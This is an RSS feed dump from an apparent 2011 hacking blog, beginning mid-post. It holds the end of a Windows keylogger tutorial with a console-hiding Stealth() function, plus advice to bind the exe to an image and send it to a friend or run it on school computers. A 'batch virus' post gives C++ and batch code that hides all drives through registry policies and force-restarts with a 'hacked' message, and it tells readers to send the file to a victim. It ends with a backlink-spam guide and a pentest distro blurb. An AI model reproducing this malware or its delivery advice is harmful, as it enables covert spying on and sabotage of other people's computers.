13)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;\n&quot;);&lt;br /&gt;else if (key_stroke == 32)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot; &quot;);&lt;br /&gt;else if (key_stroke == VK_TAB)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;[TAB]&quot;);&lt;br /&gt;else if (key_stroke == VK_SHIFT)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;[SHIFT]&quot;);&lt;br /&gt;else if (key_stroke == VK_CONTROL)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;[CONTROL]&quot;);&lt;br /&gt;else if (key_stroke == VK_ESCAPE)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;[ESCAPE]&quot;);&lt;br /&gt;else if (key_stroke == VK_END)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;[END]&quot;);&lt;br /&gt;else if (key_stroke == VK_HOME)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;[HOME]&quot;);&lt;br /&gt;else if (key_stroke == VK_LEFT)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;[LEFT]&quot;);&lt;br /&gt;else if (key_stroke == VK_UP)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;[UP]&quot;);&lt;br /&gt;else if (key_stroke == VK_RIGHT)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;[RIGHT]&quot;);&lt;br /&gt;else if (key_stroke == VK_DOWN)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;[DOWN]&quot;);&lt;br /&gt;else if (key_stroke == 190 || key_stroke == 110)&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &quot;.&quot;);&lt;br /&gt;else&lt;br /&gt;fprintf(OUTPUT_FILE, &quot;%s&quot;, &amp;amp;key_stroke);&lt;br /&gt;&lt;br /&gt;fclose (OUTPUT_FILE);&lt;br /&gt;return 0;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/* *********************************** */&lt;br /&gt;&lt;br /&gt;void Stealth()&lt;br /&gt;{&lt;br /&gt;HWND Stealth;&lt;br /&gt;AllocConsole();&lt;br /&gt;Stealth = FindWindowA(&quot;ConsoleWindowClass&quot;, NULL);&lt;br /&gt;ShowWindow(Stealth,0);&lt;br /&gt;}&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Compile the Code(Ctrl+F9)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyr-v08phyzF0gNT092ZA4I5Qc8EcQhCqPftPMdNjv_s0X8sAEvOFaCNZlOQFErCn6VcgNr4uBy8QpBO5dXXmJ9Xx6UgiJQV5PFbsl1i-XHuHDwEJ2eIiyUVe9kwF5xC12S7NlfYAX53c/s1600/Virus+kEYLOGGERS+using+Visual+C%252B%252B+1.JPG&quot; imageanchor=&quot;1&quot; style=&quot;color: #a91b33; margin-left: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;156&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyr-v08phyzF0gNT092ZA4I5Qc8EcQhCqPftPMdNjv_s0X8sAEvOFaCNZlOQFErCn6VcgNr4uBy8QpBO5dXXmJ9Xx6UgiJQV5PFbsl1i-XHuHDwEJ2eIiyUVe9kwF5xC12S7NlfYAX53c/s320/Virus+kEYLOGGERS+using+Visual+C%252B%252B+1.JPG&quot; style=&quot;border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_qfbUrUawRYwgnNSwRrCHh0vMYtTgddexK15Qg3h15Tfdwp0ID9UtbF_VqsGuIXW4bVpWGeaF3546CjUQjIotrIMRBh81ah37k3CnG0DCjrdgwgCA1dBmLCplkyZ0qaViUd5Zz7BhyphenhyphenXo/s1600/Virus+kEYLOGGERS+using+Visual+C%252B%252B+2.JPG&quot; imageanchor=&quot;1&quot; style=&quot;color: #a91b33; margin-left: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;210&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_qfbUrUawRYwgnNSwRrCHh0vMYtTgddexK15Qg3h15Tfdwp0ID9UtbF_VqsGuIXW4bVpWGeaF3546CjUQjIotrIMRBh81ah37k3CnG0DCjrdgwgCA1dBmLCplkyZ0qaViUd5Zz7BhyphenhyphenXo/s320/Virus+kEYLOGGERS+using+Visual+C%252B%252B+2.JPG&quot; style=&quot;border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;Now execute the program by selecting Execute-&amp;gt;Run(ctrl+F10)&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;you can see the log.txt file where you save the file.&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo4ll7MBVqYE-TEUv_ch-KilVE3v51CWB4b39j9-U8ZTZEh102FJjgo62PtC5PMZmZN5xnokDUkQgKrKbRstu_corgeI3KVNQVvvJ0N0o8QPEpKFOWhC4d8ExecCIggNoplqFSpdI-NtU/s1600/Virus+kEYLOGGERS+using+Visual+C%252B%252B+3.JPG&quot; imageanchor=&quot;1&quot; style=&quot;color: #a91b33; margin-left: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;133&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo4ll7MBVqYE-TEUv_ch-KilVE3v51CWB4b39j9-U8ZTZEh102FJjgo62PtC5PMZmZN5xnokDUkQgKrKbRstu_corgeI3KVNQVvvJ0N0o8QPEpKFOWhC4d8ExecCIggNoplqFSpdI-NtU/s320/Virus+kEYLOGGERS+using+Visual+C%252B%252B+3.JPG&quot; style=&quot;border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3yZTLL4GkyypWtNZ6SwOHZIwVaxDVgJKs5BuUUUYjwvJ2J5Q9PpOjr3ymyIuqsuuaSwaxZbXJpABw2luEvBYH-kYedraszT1_sSL_ZsHKgy5mmNn_abERDtM30f7LpnF3GcfzDsSqwWg/s1600/Virus+kEYLOGGERS+using+Visual+C%252B%252B+4.JPG&quot; imageanchor=&quot;1&quot; style=&quot;color: #a91b33; margin-left: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;115&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3yZTLL4GkyypWtNZ6SwOHZIwVaxDVgJKs5BuUUUYjwvJ2J5Q9PpOjr3ymyIuqsuuaSwaxZbXJpABw2luEvBYH-kYedraszT1_sSL_ZsHKgy5mmNn_abERDtM30f7LpnF3GcfzDsSqwWg/s400/Virus+kEYLOGGERS+using+Visual+C%252B%252B+4.JPG&quot; style=&quot;border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; padding-top: 10px;&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;bind the exe file with image or any files and send it to your friend. (0r) if you have physical access to your college/school system,then copy the exe file in that system and run it.&lt;/span&gt;&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
</description><link>http://pchackerz.blogspot.com/2011/09/learn-to-create-keylogger-using-c.html</link><author>noreply@blogger.com (paventhan)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyr-v08phyzF0gNT092ZA4I5Qc8EcQhCqPftPMdNjv_s0X8sAEvOFaCNZlOQFErCn6VcgNr4uBy8QpBO5dXXmJ9Xx6UgiJQV5PFbsl1i-XHuHDwEJ2eIiyUVe9kwF5xC12S7NlfYAX53c/s72-c/Virus+kEYLOGGERS+using+Visual+C%252B%252B+1.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-4343076030448207462</guid><pubDate>Fri, 02 Sep 2011 10:44:00 +0000</pubDate><atom:updated>2011-09-02T03:44:07.477-07:00</atom:updated><title>Batch Virus code to disable all the Hard disks</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means
&lt;span class=&quot;fullpost&quot;&gt;

&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.&lt;/div&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; line-height: 20px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; color: black;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;#include &amp;lt; windows.h &amp;gt;&lt;br /&gt;#include &amp;lt; fstream.h &amp;gt;&lt;br /&gt;#include &amp;lt; iostream.h &amp;gt;&lt;br /&gt;#include &amp;lt; string.h &amp;gt;&lt;br /&gt;#include &amp;lt; conio.h &amp;gt;&lt;br /&gt;int main()&lt;br /&gt;{&lt;br /&gt;ofstream write ( &quot;C:\\WINDOWS\\system32\\HackingStar.bat&quot; ); /*opening or creating new file with .bat extension*/&lt;br /&gt;&lt;br /&gt;write &amp;lt;&amp;lt; &quot;REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n&quot;; write &amp;lt;&amp;lt; &quot;REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n&quot;; write&amp;lt;&amp;lt;&quot;shutdown -r -c \&quot;Sorry Your System is hacked by us!\&quot; -f&quot;&amp;lt;&amp;lt;&quot;\n&quot;; write.close(); //close file ShellExecute(NULL,&quot;open&quot;,&quot;C:\\WINDOWS\\system32\\HackingStar.bat &quot;,NULL,NULL,SW_SHOWNORMAL); return 0; }&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Copy the above code and paste in notepad&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Save the file with .cpp extension&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Compile and create .exe file in cpp&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Note:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Don&#39;t run this c++ program ,it will attack your system itself.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Copy the created .exe file and send it to your victim. You can also attach it with any other&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
exe files.&lt;/div&gt;
&lt;br /&gt;&lt;b&gt;Batch Virus Code Creation:&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; line-height: 20px;&quot;&gt;REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n&lt;br /&gt;&lt;br /&gt;REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n&lt;br /&gt;&lt;br /&gt;shutdown -r -c \&quot;Sorry Your System is hacked by us!\&quot; -f&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: #dff0ff; font-family: Arial, Tahoma, Verdana; font-size: 13px; line-height: 20px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
I think this code will simple for non c++ programmers. It is easy to create the batch file also.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Copy the above code to notepad.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Save it with .bat extension (for ex: nodrivevirus.bat)&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Send the file to your victim&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
</description><link>http://pchackerz.blogspot.com/2011/09/batch-virus-code-to-disable-all-hard.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-2698384373677115827</guid><pubDate>Fri, 26 Aug 2011 06:58:00 +0000</pubDate><atom:updated>2011-08-26T00:03:26.144-07:00</atom:updated><title>2500 backlinks in a 2 minutes</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;First, lets discuss what is a static page. A static page is a page created especially, and automatically, for a certain reason to accomplish a certain purpose. Most of the static pages out there are monitoring websites that create pages showing information about the websites they monitored. These kind of pages hold a certain link building potential as they are easy to exploit and in mass they can do a great difference.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;As you can see there are &lt;a href=&quot;http://en.wikipedia.org/wiki/Backlinks&quot;&gt;backlinks&lt;/a&gt; pointing toward this website; they might not be strong link juice but they are still crawled and considered by the Search Engines.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;Why use static Page &lt;a href=&quot;http://en.wikipedia.org/wiki/Backlinks&quot;&gt;backlinks&lt;/a&gt;:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;http://yourmentoringprogram.com/ip-diversity-important-backlink-technique/&quot;&gt;Great IP diversity&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;
&lt;li&gt;Automatic process&lt;/li&gt;
&lt;li&gt;Natural looking&lt;/li&gt;
&lt;li&gt;Can make a difference&lt;/li&gt;
&lt;li&gt;Free&lt;/li&gt;
&lt;li&gt;Easy and quick to create and set-up&lt;/li&gt;
&lt;li&gt;permanent&lt;/li&gt;
&lt;li&gt;Doesn’t raise suspicion&lt;/li&gt;
&lt;/span&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;What Tool to use:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;There are several websites that allow you to create hundreds/thousands of static pages and &lt;a href=&quot;http://en.wikipedia.org/wiki/Backlinks&quot;&gt;backlinks&lt;/a&gt; but the bestone so far I have been using is :&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;http://www.imtalk.org/cmps_index.php?pageid=IMT-Website-Submitter&quot;&gt;http://www.imtalk.org/cmps_index.php?pageid=IMT-Website-Submitter&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;What this websites allows you to do is create 2523 pages that will have &lt;a href=&quot;http://en.wikipedia.org/wiki/Backlinks&quot;&gt;backlinks&lt;/a&gt; pointing to your website in only a moment. All that is required for you to do is fill a small box and add your URL and keywords and then select how much submissions you want.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;http://www.get-free-dofollow-backlinks.com/wp-content/uploads/2011/07/2011-mm-24-8-26-40-PM.png&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img height=&quot;124&quot; src=&quot;http://www.get-free-dofollow-backlinks.com/wp-content/uploads/2011/07/2011-mm-24-8-26-40-PM.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;The process will last around one hour, and all the pages will be created without you having anything to do except watch these links get created; Or spend that time on other SEM project.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;http://www.get-free-dofollow-backlinks.com/wp-content/uploads/2011/07/2011-mm-24-8-26-12-PM.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;197&quot; src=&quot;http://www.get-free-dofollow-backlinks.com/wp-content/uploads/2011/07/2011-mm-24-8-26-12-PM.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;On what website should you use this:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Static page link building should be used on any website as this method doesn’t raise suspicion from the search engines at all. In facts when I create a new website, this is the first real link building technique I use on the website. This gives a quick boost that often allows you to rank on page 1-2 very quickly and then start some more serious link building methods afterward.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;There are some other very successful static page creating programs like &lt;a href=&quot;http://www.scrapebox.com/free-link-checker&quot;&gt;scrapebox&lt;/a&gt; for exemple that can allow you to make ten of thousands of static page &lt;a href=&quot;http://en.wikipedia.org/wiki/Backlinks&quot;&gt;backlinks&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/2500-backlinks-in-2-minutes.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-2461954718705190742</guid><pubDate>Thu, 25 Aug 2011 07:21:00 +0000</pubDate><atom:updated>2011-08-25T00:21:59.342-07:00</atom:updated><title>Live Hacking DVD</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;This is only for educational purpose not any other means &lt;/span&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Live Hacking DVD is a new Linux distribution packed with tools and utilities for ethical hacking, penetration testing and countermeasure verification. Based on Ubuntu this ‘Live DVD” runs directly from the DVD and doesn’t require installation on your hard-drive. Once booted you can use the included tools to test, check, ethically hack and perform penetration tests on your own network to make sure that it is secure from outside intruders. &lt;/span&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;As well as the standard Linux networking tools like ping, wget, curl, telnet and ssh, the Live Hacking DVD has tools for DNS enumeration and reconnaissance as well as utilities for foot-printing, password cracking and network sniffing. It also has programs for spoofing and a set of wireless networking utilities. &lt;/span&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;The Live Hacking DVD is designed for ethical computer hacking, meaning that it contains the tools and utilities you need to test and hack your own network but using the tools and techniques that more malicious hackers would use. &lt;/span&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;The Live Hacking DVD is based on open source technology and uses the popular Ubuntu Linux distribution as its base. All the tools included can be freely found in either the Ubuntu repositories on from the Internet. The DVD is designed to be a platform to help IT security professionals (as well as those with a general interest in information security) to start, understand and conduct penetration tests and ethical hacking.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
